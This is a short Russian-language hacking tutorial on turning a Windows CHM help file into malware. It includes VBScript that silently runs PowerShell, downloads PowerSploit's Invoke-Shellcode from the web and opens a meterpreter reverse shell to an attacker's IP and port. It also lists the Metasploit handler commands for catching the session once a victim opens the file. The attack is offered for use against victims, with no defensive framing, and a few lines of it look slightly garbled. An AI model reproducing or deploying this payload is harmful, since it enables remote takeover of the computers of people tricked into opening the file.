HTMLHelp (CHM) - это формат файлов Windows выпущенный в 1997 году, представляет из себя комплекс сжатых HTML страниц и используется для предоставления различной информации пользователям программ, к примеру.
В данные файлы можно интегрировать VBScript или JavaScript код, что открывает возможность для создания вредоносного CHM файла, путем добавления в разметку кодового блока с пейлоадом, чем мы сегодня и займемся.
Создание вредоносного файла
Для начала скачаем компилятор htm2chm. С помощью него мы сможем создавать CHM файлы из обычных HTML страниц.
Далее создаем .html файл, со следующим кодом
Подставляем нужные значения ip адреса и порта, после чего компилируем файл. Открываем htm2chm, нажимаем "Compiler", в поле Folder выбираем папку с созданным файлом, жмем "Start".
<body>
<script language="VBScript">
Set cmd = CreateObject("wscript.shell")
cmd.Run "powershell -w hidden -nop -noni -exec bypass IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/cheetz PowerSploit/master/CodeExecution/Invoke--Shellcode.ps1'); Invoke-Shellcode -payload windows/meterpreter/reverse_https -lhost <ip адрес> -lport <порт> -force"
</script>
</body>
</html>
Проведение атаки
Перед запуском зараженного файла на ПК жертвы необходимо подготовить meterpreter.
Прописываем в терминале Kali Linux ряд команд поочередно
-qПодставляем нужные значения, и как только на целевом ПК откроется вредоносный файл, в терминал моментально прилетит открытая сессия.
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_https
set LHOST <ip адрес>
set LPORT <порт>
#хакинг #вирусы